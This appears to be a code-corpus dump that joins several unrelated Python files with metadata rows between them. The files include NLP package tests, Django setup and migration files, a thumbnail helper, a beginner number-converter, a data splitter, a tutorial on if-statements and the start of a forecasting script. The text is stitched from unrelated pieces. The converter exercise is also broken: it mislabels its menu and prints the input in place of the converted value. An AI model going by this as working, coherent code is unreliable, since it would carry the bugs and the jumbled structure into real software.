"para": "1",
"page": "1",
"offset": "70",
"length": "5",
},
{
"text": "and",
"id": "w14",
"sent": "1",
"para": "1",
"page": "1",
"offset": "76",
"length": "3",
},
{
"text": "stanza",
"id": "w15",
"sent": "1",
"para": "1",
"page": "1",
"offset": "80",
"length": "6",
},
{
"text": "pipelines",
"id": "w16",
"sent": "1",
"para": "1",
"page": "1",
"offset": "87",
"length": "9",
},
{
"text": "with",
"id": "w17",
"sent": "1",
"para": "1",
"page": "1",
"offset": "97",
"length": "4",
},
{
"text": "(",
"id": "w18",
"sent": "1",
"para": "1",
"page": "1",
"offset": "102",
"length": "1",
},
{
"text": "intermediate",
"id": "w19",
"sent": "1",
"para": "1",
"page": "1",
"offset": "103",
"length": "12",
},
{
"text": ")",
"id": "w20",
"sent": "1",
"para": "1",
"page": "1",
"offset": "115",
"length": "1",
},
{
"text": "results",
"id": "w21",
"sent": "1",
"para": "1",
"page": "1",
"offset": "117",
"length": "7",
},
{
"text": "and",
"id": "w22",
"sent": "1",
"para": "1",
"page": "1",
"offset": "125",
"length": "3",
},
{
"text": "all",
"id": "w23",
"sent": "1",
"para": "1",
"page": "1",
"offset": "129",
"length": "3",
},
{
"text": "processing",
"id": "w24",
"sent": "1",
"para": "1",
"page": "1",
"offset": "133",
"length": "10",
},
{
"text": "steps",
"id": "w25",
"sent": "1",
"para": "1",
"page": "1",
"offset": "144",
"length": "5",
},
{
"text": "in",
"id": "w26",
"sent": "1",
"para": "1",
"page": "1",
"offset": "150",
"length": "2",
},
{
"text": "one",
"id": "w27",
"sent": "1",
"para": "1",
"page": "1",
"offset": "153",
"length": "3",
},
{
"text": "format",
"id": "w28",
"sent": "1",
"para": "1",
"page": "1",
"offset": "157",
"length": "6",
},
{
"text": ".",
"id": "w29",
"sent": "1",
"para": "1",
"page": "1",
"offset": "163",
"length": "1",
},
{
"text": "Multiwords",
"id": "w30",
"sent": "2",
"para": "2",
"page": "1",
"offset": "166",
"length": "10",
},
{
"text": "like",
"id": "w31",
"sent": "2",
"para": "2",
"page": "1",
"offset": "177",
"length": "4",
},
{
"text": "in",
"id": "w32",
"sent": "2",
"para": "2",
"page": "1",
"offset": "182",
"length": "2",
},
{
"text": "“",
"id": "w33",
"sent": "2",
"para": "2",
"page": "1",
"offset": "185",
"length": "1",
},
{
"text": "we",
"id": "w34",
"sent": "2",
"para": "2",
"page": "1",
"offset": "186",
"length": "2",
},
{
"text": "have",
"id": "w35",
"sent": "2",
"para": "2",
"page": "1",
"offset": "189",
"length": "4",
},
{
"text": "set",
"id": "w36",
"sent": "2",
"para": "2",
"page": "1",
"offset": "194",
"length": "3",
},
{
"text": "that",
"id": "w37",
"sent": "2",
"para": "2",
"page": "1",
"offset": "198",
"length": "4",
},
{
"text": "out",
"id": "w38",
"sent": "2",
"para": "2",
"page": "1",
"offset": "203",
"length": "3",
},
{
"text": "below",
"id": "w39",
"sent": "2",
"para": "2",
"page": "1",
"offset": "207",
"length": "5",
},
{
"text": "”",
"id": "w40",
"sent": "2",
"para": "2",
"page": "1",
"offset": "212",
"length": "1",
},
{
"text": "are",
"id": "w41",
"sent": "2",
"para": "2",
"page": "1",
"offset": "214",
"length": "3",
},
{
"text": "recognized",
"id": "w42",
"sent": "2",
"para": "2",
"page": "1",
"offset": "218",
"length": "10",
},
{
"text": "(",
"id": "w43",
"sent": "2",
"para": "2",
"page": "1",
"offset": "229",
"length": "1",
},
{
"text": "depending",
"id": "w44",
"sent": "2",
"para": "2",
"page": "1",
"offset": "230",
"length": "9",
},
{
"text": "on",
"id": "w45",
"sent": "2",
"para": "2",
"page": "1",
"offset": "240",
"length": "2",
},
{
"text": "your",
"id": "w46",
"sent": "2",
"para": "2",
"page": "1",
"offset": "243",
"length": "4",
},
{
"text": "NLP",
"id": "w47",
"sent": "2",
"para": "2",
"page": "1",
"offset": "248",
"length": "3",
},
{
"text": "processor",
"id": "w48",
"sent": "2",
"para": "2",
"page": "1",
"offset": "252",
"length": "9",
},
{
"text": ")",
"id": "w49",
"sent": "2",
"para": "2",
"page": "1",
"offset": "261",
"length": "1",
},
{
"text": ".",
"id": "w50",
"sent": "2",
"para": "2",
"page": "1",
"offset": "262",
"length": "1",
},
]
diff = DeepDiff(actual, expected)
assert diff == dict(), diff
def test_8_docx_terms(self):
naf = NafDocument().open(join("tests", "tests", "example.docx.naf.xml"))
actual = naf.terms
expected = [
{
"id": "t1",
"type": "open",
"lemma": "the",
"pos": "DET",
"morphofeat": "Definite=Def|PronType=Art",
"span": [{"id": "w1"}],
},
{
"id": "t2",
"type": "open",
"lemma": "Nafigator",
"pos": "PROPN",
"morphofeat": "Number=Sing",
"span": [{"id": "w2"}],
},
{
"id": "t3",
"type": "open",
"lemma": "package",
"pos": "NOUN",
"morphofeat": "Number=Sing",
"span": [{"id": "w3"}],
},
{
"id": "t4",
"type": "open",
"lemma": "allow",
"pos": "VERB",
"morphofeat": "Mood=Ind|Number=Sing|Person=3|Tense=Pres|VerbForm=Fin",
"span": [{"id": "w4"}],
},
{
"id": "t5",
"type": "open",
"lemma": "you",
"pos": "PRON",
"morphofeat": "Case=Acc|Person=2|PronType=Prs",
"span": [{"id": "w5"}],
},
{
"id": "t6",
"type": "open",
"lemma": "to",
"pos": "PART",
"span": [{"id": "w6"}],
},
{
"id": "t7",
"type": "open",
"lemma": "store",
"pos": "VERB",
"morphofeat": "VerbForm=Inf",
"span": [{"id": "w7"}],
},
{
"id": "t8",
"type": "open",
"lemma": "nlp",
"pos": "NOUN",
"morphofeat": "Number=Sing",
"span": [{"id": "w8"}],
},
{
"id": "t9",
"type": "open",
"lemma": "output",
"pos": "NOUN",
"morphofeat": "Number=Sing",
"span": [{"id": "w9"}],
},
{
"id": "t10",
"type": "open",
"lemma": "from",
"pos": "ADP",
"span": [{"id": "w10"}],
},
{
"id": "t11",
"type": "open",
"lemma": "custom",
"pos": "NOUN",
"morphofeat": "Number=Sing",
"span": [{"id": "w11"}],
},
{
"id": "t12",
"type": "open",
"lemma": "make",
"pos": "VERB",
"morphofeat": "Tense=Past|VerbForm=Part",
"span": [{"id": "w12"}],
},
{
"id": "t13",
"type": "open",
"lemma": "spacy",
"pos": "NOUN",
"morphofeat": "Number=Sing",
"span": [{"id": "w13"}],
},
{
"id": "t14",
"type": "open",
"lemma": "and",
"pos": "CCONJ",
"span": [{"id": "w14"}],
},
{
"id": "t15",
"type": "open",
"lemma": "stanza",
"pos": "NOUN",
"morphofeat": "Number=Sing",
"span": [{"id": "w15"}],
},
{
"id": "t16",
"type": "open",
"lemma": "pipeline",
"pos": "NOUN",
"morphofeat": "Number=Plur",
"span": [{"id": "w16"}],
},
{
"id": "t17",
"type": "open",
"lemma": "with",
"pos": "ADP",
"span": [{"id": "w17"}],
},
{
"id": "t18",
"type": "open",
"lemma": "(",
"pos": "PUNCT",
"span": [{"id": "w18"}],
},
{
"id": "t19",
"type": "open",
"lemma": "intermediate",
"pos": "ADJ",
"morphofeat": "Degree=Pos",
"span": [{"id": "w19"}],
},
{
"id": "t20",
"type": "open",
"lemma": ")",
"pos": "PUNCT",
"span": [{"id": "w20"}],
},
{
"id": "t21",
"type": "open",
"lemma": "result",
"pos": "NOUN",
"morphofeat": "Number=Plur",
"span": [{"id": "w21"}],
},
{
"id": "t22",
"type": "open",
"lemma": "and",
"pos": "CCONJ",
"span": [{"id": "w22"}],
},
{
"id": "t23",
"type": "open",
"lemma": "all",
"pos": "DET",
"span": [{"id": "w23"}],
},
{
"id": "t24",
"type": "open",
"lemma": "processing",
"pos": "NOUN",
"morphofeat": "Number=Sing",
"span": [{"id": "w24"}],
},
{
"id": "t25",
"type": "open",
"lemma": "step",
"pos": "NOUN",
"morphofeat": "Number=Plur",
"span": [{"id": "w25"}],
},
{
"id": "t26",
"type": "open",
"lemma": "in",
"pos": "ADP",
"span": [{"id": "w26"}],
},
{
"id": "t27",
"type": "open",
"lemma": "one",
"pos": "NUM",
"morphofeat": "NumType=Card",
"span": [{"id": "w27"}],
},
{
"id": "t28",
"type": "open",
"lemma": "format",
"pos": "NOUN",
"morphofeat": "Number=Sing",
"span": [{"id": "w28"}],
},
{
"id": "t29",
"type": "open",
"lemma": ".",
"pos": "PUNCT",
"span": [{"id": "w29"}],
},
{
"id": "t30",
"type": "open",
"lemma": "multiword",
"pos": "NOUN",
"morphofeat": "Number=Plur",
"span": [{"id": "w30"}],
},
{
"id": "t31",
"type": "open",
"lemma": "like",
"pos": "ADP",
"span": [{"id": "w31"}],
},
{
"id": "t32",
"type": "open",
"lemma": "in",
"pos": "ADP",
"span": [{"id": "w32"}],
},
{
"id": "t33",
"type": "open",
"lemma": '"',
"pos": "PUNCT",
"span": [{"id": "w33"}],
},
{
"id": "t34",
"type": "open",
"lemma": "we",
"pos": "PRON",
"morphofeat": "Case=Nom|Number=Plur|Person=1|PronType=Prs",
"span": [{"id": "w34"}],
},
{
"id": "t35",
"type": "open",
"lemma": "have",
"pos": "AUX",
"morphofeat": "Mood=Ind|Tense=Pres|VerbForm=Fin",
"span": [{"id": "w35"}],
},
{
"id": "t36",
"type": "open",
"lemma": "set",
"pos": "VERB",
"morphofeat": "Tense=Past|VerbForm=Part",
"component_of": "mw1",
"span": [{"id": "w36"}],
},
{
"id": "t37",
"type": "open",
"lemma": "that",
"pos": "SCONJ",
"span": [{"id": "w37"}],
},
{
"id": "t38",
"type": "open",
"lemma": "out",
"pos": "ADP",
"component_of": "mw1",
"span": [{"id": "w38"}],
},
{
"id": "t39",
"type": "open",
"lemma": "below",
"pos": "ADV",
"span": [{"id": "w39"}],
},
{
"id": "t40",
"type": "open",
"lemma": '"',
"pos": "PUNCT",
"span": [{"id": "w40"}],
},
{
"id": "t41",
"type": "open",
"lemma": "be",
"pos": "AUX",
"morphofeat": "Mood=Ind|Tense=Pres|VerbForm=Fin",
"span": [{"id": "w41"}],
},
{
"id": "t42",
"type": "open",
"lemma": "recognize",
"pos": "VERB",
"morphofeat": "Tense=Past|VerbForm=Part|Voice=Pass",
"span": [{"id": "w42"}],
},
{
"id": "t43",
"type": "open",
"lemma": "(",
"pos": "PUNCT",
"span": [{"id": "w43"}],
},
{
"id": "t44",
"type": "open",
"lemma": "depend",
"pos": "VERB",
"morphofeat": "VerbForm=Ger",
"span": [{"id": "w44"}],
},
{
"id": "t45",
"type": "open",
"lemma": "on",
"pos": "ADP",
"span": [{"id": "w45"}],
},
{
"id": "t46",
"type": "open",
"lemma": "you",
"pos": "PRON",
"morphofeat": "Person=2|Poss=Yes|PronType=Prs",
"span": [{"id": "w46"}],
},
{
"id": "t47",
"type": "open",
"lemma": "nlp",
"pos": "NOUN",
"morphofeat": "Number=Sing",
"span": [{"id": "w47"}],
},
{
"id": "t48",
"type": "open",
"lemma": "processor",
"pos": "NOUN",
"morphofeat": "Number=Sing",
"span": [{"id": "w48"}],
},
{
"id": "t49",
"type": "open",
"lemma": ")",
"pos": "PUNCT",
"span": [{"id": "w49"}],
},
{
"id": "t50",
"type": "open",
"lemma": ".",
"pos": "PUNCT",
"span": [{"id": "w50"}],
},
]
assert actual == expected, (
"expected: " + str(expected) + ", actual: " + str(actual)
)
def test_9_docx_dependencies(self):
naf = NafDocument().open(join("tests", "tests", "example.docx.naf.xml"))
actual = naf.deps
expected = [
{"from_term": "t3", "to_term": "t1", "rfunc": "det"},
{"from_term": "t4", "to_term": "t3", "rfunc": "nsubj"},
{"from_term": "t3", "to_term": "t2", "rfunc": "compound"},
{"from_term": "t4", "to_term": "t5", "rfunc": "obj"},
{"from_term": "t7", "to_term": "t6", "rfunc": "mark"},
{"from_term": "t4", "to_term": "t7", "rfunc": "xcomp"},
{"from_term": "t9", "to_term": "t8", "rfunc": "compound"},
{"from_term": "t7", "to_term": "t9", "rfunc": "obj"},
{"from_term": "t13", "to_term": "t10", "rfunc": "case"},
{"from_term": "t9", "to_term": "t13", "rfunc": "nmod"},
{"from_term": "t12", "to_term": "t11", "rfunc": "compound"},
{"from_term": "t13", "to_term": "t12", "rfunc": "amod"},
{"from_term": "t16", "to_term": "t14", "rfunc": "cc"},
{"from_term": "t13", "to_term": "t16", "rfunc": "conj"},
{"from_term": "t16", "to_term": "t15", "rfunc": "compound"},
{"from_term": "t21", "to_term": "t17", "rfunc": "case"},
{"from_term": "t7", "to_term": "t21", "rfunc": "obl"},
{"from_term": "t21", "to_term": "t18", "rfunc": "punct"},
{"from_term": "t21", "to_term": "t19", "rfunc": "amod"},
{"from_term": "t21", "to_term": "t20", "rfunc": "punct"},
{"from_term": "t25", "to_term": "t22", "rfunc": "cc"},
{"from_term": "t13", "to_term": "t25", "rfunc": "conj"},
{"from_term": "t25", "to_term": "t23", "rfunc": "det"},
{"from_term": "t25", "to_term": "t24", "rfunc": "compound"},
{"from_term": "t28", "to_term": "t26", "rfunc": "case"},
{"from_term": "t25", "to_term": "t28", "rfunc": "nmod"},
{"from_term": "t28", "to_term": "t27", "rfunc": "nummod"},
{"from_term": "t4", "to_term": "t29", "rfunc": "punct"},
{"from_term": "t36", "to_term": "t31", "rfunc": "mark"},
{"from_term": "t30", "to_term": "t36", "rfunc": "acl"},
{"from_term": "t36", "to_term": "t32", "rfunc": "mark"},
{"from_term": "t36", "to_term": "t33", "rfunc": "punct"},
{"from_term": "t36", "to_term": "t34", "rfunc": "nsubj"},
{"from_term": "t36", "to_term": "t35", "rfunc": "aux"},
{"from_term": "t42", "to_term": "t37", "rfunc": "mark"},
{"from_term": "t36", "to_term": "t42", "rfunc": "ccomp"},
{"from_term": "t36", "to_term": "t38", "rfunc": "compound:prt"},
{"from_term": "t36", "to_term": "t39", "rfunc": "advmod"},
{"from_term": "t36", "to_term": "t40", "rfunc": "punct"},
{"from_term": "t42", "to_term": "t41", "rfunc": "aux:pass"},
{"from_term": "t48", "to_term": "t43", "rfunc": "punct"},
{"from_term": "t42", "to_term": "t48", "rfunc": "obl"},
{"from_term": "t48", "to_term": "t44", "rfunc": "case"},
{"from_term": "t48", "to_term": "t45", "rfunc": "case"},
{"from_term": "t48", "to_term": "t46", "rfunc": "nmod:poss"},
{"from_term": "t48", "to_term": "t47", "rfunc": "compound"},
{"from_term": "t48", "to_term": "t49", "rfunc": "punct"},
{"from_term": "t42", "to_term": "t50", "rfunc": "punct"},
]
assert actual == expected, (
"expected: " + str(expected) + ", actual: " + str(actual)
)
def test_10_docx_multiwords(self):
naf = NafDocument().open(join("tests", "tests", "example.docx.naf.xml"))
actual = naf.multiwords
expected = [
{
"id": "mw1",
"lemma": "set_out",
"pos": "VERB",
"type": "phrasal",
"components": [
{"id": "mw1.c1", "span": [{"id": "t36"}]},
{"id": "mw1.c2", "span": [{"id": "t38"}]},
],
}
]
assert actual == expected, (
"expected: " + str(expected) + ", actual: " + str(actual)
)
def test_11_docx_raw(self):
naf = NafDocument().open(join("tests", "tests", "example.docx.naf.xml"))
actual = naf.raw
expected = "The Nafigator package allows you to store NLP output from custom made Spacy and stanza pipelines with (intermediate) results and all processing steps in one format. Multiwords like in “we have set that out below” are recognized (depending on your NLP processor)."
assert actual == expected, (
"expected: " + str(expected) + ", actual: " + str(actual)
)
| 32.157531 | 286 | 0.283854 | 4,897 | 69,814 | 3.983051 | 0.093731 | 0.033837 | 0.018149 | 0.015381 | 0.723661 | 0.626967 | 0.616509 | 0.443117 | 0.390003 | 0.334376 | 0 | 0.060031 | 0.523505 | 69,814 | 2,170 | 287 | 32.17235 | 0.526303 | 0.0485 | 0 | 0.667314 | 0 | 0.000971 | 0.240661 | 0.014328 | 0 | 0 | 0 | 0 | 0.010685 | 1 | 0.009713 | false | 0.001943 | 0.002428 | 0 | 0.013113 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
fcdc072e1fbfda78b87aa6ba6f67523a4ef0eadf | 617 | py | Python | src/openpersonen/setup.py | maykinmedia/open-personen | ddcf083ccd4eb864c5305bcd8bc75c6c64108272 | [
"RSA-MD"
] | 2 | 2020-08-26T11:24:43.000Z | 2021-07-28T09:46:40.000Z | src/openpersonen/setup.py | maykinmedia/open-personen | ddcf083ccd4eb864c5305bcd8bc75c6c64108272 | [
"RSA-MD"
] | 153 | 2020-08-26T10:45:35.000Z | 2021-12-10T17:33:16.000Z | src/openpersonen/setup.py | maykinmedia/open-personen | ddcf083ccd4eb864c5305bcd8bc75c6c64108272 | [
"RSA-MD"
] | null | null | null | """
Bootstrap the environment.
Load the secrets from the .env file and store them in the environment, so
they are available for Django settings initialization.
.. warning::
do NOT import anything Django related here, as this file needs to be loaded
before Django is initialized.
"""
import os
from dotenv import load_dotenv
def setup_env():
# load the environment variables containing the secrets/config
dotenv_path = os.path.join(os.path.dirname(__file__), os.pardir, os.pardir, ".env")
load_dotenv(dotenv_path)
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "openpersonen.conf.dev")
| 26.826087 | 87 | 0.752026 | 88 | 617 | 5.147727 | 0.602273 | 0.092715 | 0.05298 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.165316 | 617 | 22 | 88 | 28.045455 | 0.879612 | 0.562399 | 0 | 0 | 0 | 0 | 0.179389 | 0.164122 | 0 | 0 | 0 | 0 | 0 | 1 | 0.166667 | false | 0 | 0.333333 | 0 | 0.5 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 |
fcdd550e33ec3168390a3e5561a28942444966d7 | 1,065 | py | Python | unisan/lemlit/migrations/0013_auto_20170901_0649.py | kurniantoska/ichsan_proj | f79cbcb896df902e129dcdb2affc89dc4f3844ef | [
"Apache-2.0"
] | null | null | null | unisan/lemlit/migrations/0013_auto_20170901_0649.py | kurniantoska/ichsan_proj | f79cbcb896df902e129dcdb2affc89dc4f3844ef | [
"Apache-2.0"
] | 2 | 2022-02-12T05:49:41.000Z | 2022-02-12T17:40:30.000Z | unisan/lemlit/migrations/0013_auto_20170901_0649.py | kurniantoska/ichsan_proj | f79cbcb896df902e129dcdb2affc89dc4f3844ef | [
"Apache-2.0"
] | null | null | null | # -*- coding: utf-8 -*-
# Generated by Django 1.11.4 on 2017-08-31 22:49
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('lemlit', '0012_remove_suratizinpenelitianmahasiswa_dosen'),
]
operations = [
migrations.AddField(
model_name='suratizinpenelitianmahasiswa',
name='nama_instansi',
field=models.CharField(default='Nama Kantor', max_length=80),
preserve_default=False,
),
migrations.AddField(
model_name='suratizinpenelitianmahasiswa',
name='nomor_surat',
field=models.CharField(default='xxx/LEMLIT-UNISAN/GTO/VIII/2017', max_length=50, unique=True),
preserve_default=False,
),
migrations.AddField(
model_name='suratizinpenelitianmahasiswa',
name='tujuan_surat',
field=models.CharField(default='Gorontalo', max_length=20),
preserve_default=False,
),
]
| 31.323529 | 106 | 0.631925 | 102 | 1,065 | 6.401961 | 0.568627 | 0.082695 | 0.105666 | 0.124043 | 0.430322 | 0.332312 | 0.24196 | 0.24196 | 0.24196 | 0 | 0 | 0.03939 | 0.261033 | 1,065 | 33 | 107 | 32.272727 | 0.790343 | 0.06385 | 0 | 0.461538 | 1 | 0 | 0.224346 | 0.161972 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.076923 | 0 | 0.192308 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
fce82f3e40f49996cececad59c6952decb597ac4 | 838 | py | Python | app/thumbnail.py | Kbman99/NetSecShare | 9bf4247d1c64c92dd8719747bc2e5b6147e34dc0 | [
"MIT"
] | null | null | null | app/thumbnail.py | Kbman99/NetSecShare | 9bf4247d1c64c92dd8719747bc2e5b6147e34dc0 | [
"MIT"
] | null | null | null | app/thumbnail.py | Kbman99/NetSecShare | 9bf4247d1c64c92dd8719747bc2e5b6147e34dc0 | [
"MIT"
] | null | null | null | from PIL import Image
import os
import sys
from app import app
def generate_thumbnail(infile_name):
try:
size = 206.67, 256.29
target_dir = app.config['UPLOAD_PATH']
# found_file = ''
# for name in os.listdir(target_dir):
# if infile_name in name:
# found_file = name
file_path = os.path.join(target_dir + '/', infile_name)
save_path = os.path.join(target_dir + '/', os.path.splitext(infile_name)[0])
print(target_dir, file=sys.stderr)
print(infile_name, file=sys.stderr)
outfile = Image.open(file_path)
outfile.thumbnail(size)
outfile.save(save_path + '_thumbnail.png')
except Exception as e:
print('Error on line {}'.format(sys.exc_info()[-1].tb_lineno), type(e), e, file=sys.stderr)
print(e)
| 32.230769 | 99 | 0.616945 | 117 | 838 | 4.239316 | 0.444444 | 0.100806 | 0.078629 | 0.056452 | 0.092742 | 0.092742 | 0 | 0 | 0 | 0 | 0 | 0.019355 | 0.260143 | 838 | 25 | 100 | 33.52 | 0.780645 | 0.125298 | 0 | 0 | 1 | 0 | 0.059066 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.055556 | false | 0 | 0.222222 | 0 | 0.277778 | 0.222222 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
fcf6168c1892c3343e6804e126e224dff6e56701 | 349 | py | Python | study/curso-em-video/exercises/037.py | jhonatanmaia/python | d53c64e6bab598c7e85813fd3f107c6f23c1fc46 | [
"MIT"
] | null | null | null | study/curso-em-video/exercises/037.py | jhonatanmaia/python | d53c64e6bab598c7e85813fd3f107c6f23c1fc46 | [
"MIT"
] | null | null | null | study/curso-em-video/exercises/037.py | jhonatanmaia/python | d53c64e6bab598c7e85813fd3f107c6f23c1fc46 | [
"MIT"
] | null | null | null | x=int(input('Enter the number to convert: '))
print('Select the convertion')
print('''
[ 1 ] Binary
[ 1 ] Octal
[ 3 ] HexaDeicmal
''')
y=int(input('1 - Binary 2 - Octal 3 - Hexadecimal'))
if y==1:
bin(x)[2:]
print('{}'.format(x))
elif y==2:
oct(x)
print('{}'.format(x))
elif y==3:
hex(x)
print(x)
else:
print('Invalid') | 17.45 | 52 | 0.558739 | 55 | 349 | 3.545455 | 0.490909 | 0.082051 | 0.123077 | 0.164103 | 0.174359 | 0 | 0 | 0 | 0 | 0 | 0 | 0.036496 | 0.2149 | 349 | 20 | 53 | 17.45 | 0.675182 | 0 | 0 | 0.105263 | 0 | 0 | 0.405714 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0.315789 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
fcffbb8be658a956fb865be73b94931d9639eccb | 435 | py | Python | modeling/src/load_data.py | alyildiz/covid_19_xray | 4128cfa7146fd4f26ef5f53ee2f9231800c1abcb | [
"MIT"
] | null | null | null | modeling/src/load_data.py | alyildiz/covid_19_xray | 4128cfa7146fd4f26ef5f53ee2f9231800c1abcb | [
"MIT"
] | null | null | null | modeling/src/load_data.py | alyildiz/covid_19_xray | 4128cfa7146fd4f26ef5f53ee2f9231800c1abcb | [
"MIT"
] | null | null | null | from sklearn.model_selection import train_test_split
from src.utils import load_dataset
def get_data():
train_list_file, train_list_class = load_dataset(data_part="train")
test_x, test_y = load_dataset(data_part="test")
train_x, val_x, train_y, val_y = train_test_split(
train_list_file, train_list_class, stratify=train_list_class, test_size=0.3
)
return train_x, val_x, test_x, train_y, val_y, test_y
| 31.071429 | 83 | 0.76092 | 75 | 435 | 3.96 | 0.36 | 0.151515 | 0.141414 | 0.121212 | 0.255892 | 0.181818 | 0 | 0 | 0 | 0 | 0 | 0.00545 | 0.156322 | 435 | 13 | 84 | 33.461538 | 0.803815 | 0 | 0 | 0 | 0 | 0 | 0.02069 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.111111 | true | 0 | 0.222222 | 0 | 0.444444 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
1e0295cc93121468ac47831901ff4745a891d601 | 2,717 | py | Python | day-3-if-condition.py | roshansinghbisht/hello-python | 595418a47e66217ed8759c91cdb535e8fa88412b | [
"MIT"
] | null | null | null | day-3-if-condition.py | roshansinghbisht/hello-python | 595418a47e66217ed8759c91cdb535e8fa88412b | [
"MIT"
] | null | null | null | day-3-if-condition.py | roshansinghbisht/hello-python | 595418a47e66217ed8759c91cdb535e8fa88412b | [
"MIT"
] | null | null | null | # TASK:
# Given an integer, n, perform the following conditional actions:
# If n is odd, print Weird
# If n is even and in the inclusive range of 2 to 5, print Not Weird
# If n is even and in the inclusive range of 6 to 20, print Weird
# If n is even and greater than 20, print Not Weird
if __name__ == '__main__':
n = int(input().strip())
if n % 2 == 1:
print('Weird')
elif 2 <= n <= 5:
print('Not Weird')
elif 6 <= n <= 20:
print('Weird')
else:
print('Not Weird')
# input(): Read a string from standard input. The trailing newline is
# stripped. If you include the optional <prompt> argument, input()
# displays it as a prompt to the user before pausing to read input.
# >>> name = input('What is your name? ')
# input() always returns a string. If you want a numeric type, then
# you need to convert the string to the appropriate type with the int()
# as we did in above code.
# Frequently, a program needs to skip over some statements, execute a
# series of statements repetitively, or choose between alternate sets
# of statements to execute.
# That is where control structures come in. A control structure directs
# the order of execution of the statements in a program (referred to as
# the program’s control flow).
# In a Python program, the if statement is how we perform this sort of
# decision-making. It allows for conditional execution of a statement or
# group of statements based on the value of an expression. Syntax:
# if <expr>: #<expr> is an expression evaluated in boolean
# <statements> #these are valid Python statements, which must be indented.
# Sometimes, you want to evaluate a condition and take one path if it
# is true but specify an alternative path if it is not. This is accomplished
# with an else
# clause:
# if <expr>:
# <statement(s)>
# else:
# <statement(s)>
# If <expr> is true, the first suite is executed, and the second is skipped.
# If <expr> is false, the first suite is skipped and the second is executed.
# There is also syntax for branching execution based on several alternatives.
# For this, use one or more elif (short for else if) clauses. Python evaluates
# each <expr> in turn and executes the suite corresponding to the first that is
# true. If none of the expressions
# are true, and an else clause is specified, then its suite is executed:
# if <expr>:
# <statement(s)>
# elif <expr>:
# <statement(s)>
# elif <expr>:
# <statement(s)>
# ...
# else:
# <statement(s)>
# At most, one of the code blocks specified will be executed. If an else clause
# isn’t included, and all the conditions are false, then none of the blocks will
# be executed.
| 38.814286 | 81 | 0.694148 | 437 | 2,717 | 4.297483 | 0.386728 | 0.031949 | 0.01065 | 0.015974 | 0.103834 | 0.103834 | 0.08147 | 0.040469 | 0.040469 | 0.040469 | 0 | 0.006632 | 0.22304 | 2,717 | 69 | 82 | 39.376812 | 0.882994 | 0.868237 | 0 | 0.4 | 0 | 0 | 0.118421 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0.4 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
1e04859ff7d5d3c3aacb33208a98e3c4d2b062d2 | 23,314 | py | Python | 5.2_CUSTOM_LIBRARY/day_by_day_best_low_error_point_forecast_between_all_models.py | pedroMoya/M5_kaggle_accuracy_KAGGLE_M5_A_share | 68126d57c44c18530782ccfe8a9df499889a47a3 | [
"MIT"
] | 2 | 2020-06-02T18:39:45.000Z | 2021-01-01T19:17:15.000Z | 5.2_CUSTOM_LIBRARY/day_by_day_best_low_error_point_forecast_between_all_models.py | pedroMoya/M5_kaggle_accuracy_KAGGLE_M5_A_share | 68126d57c44c18530782ccfe8a9df499889a47a3 | [
"MIT"
] | 1 | 2021-01-01T19:17:08.000Z | 2021-03-19T00:10:52.000Z | 5.2_CUSTOM_LIBRARY/day_by_day_best_low_error_point_forecast_between_all_models.py | pedroMoya/M5_kaggle_accuracy_KAGGLE_M5_A_share | 68126d57c44c18530782ccfe8a9df499889a47a3 | [
"MIT"
] | 1 | 2021-01-01T19:17:17.000Z | 2021-01-01T19:17:17.000Z | # analyzing each point forecast and selecting the best, day by day, saving forecasts and making final forecast
import os
import sys
import datetime
import logging
import logging.handlers as handlers
import json
import itertools as it
import pandas as pd
import numpy as np
# open local settings
with open('./settings.json') as local_json_file:
local_submodule_settings = json.loads(local_json_file.read())
local_json_file.close()
# log setup
current_script_name = os.path.basename(__file__).split('.')[0]
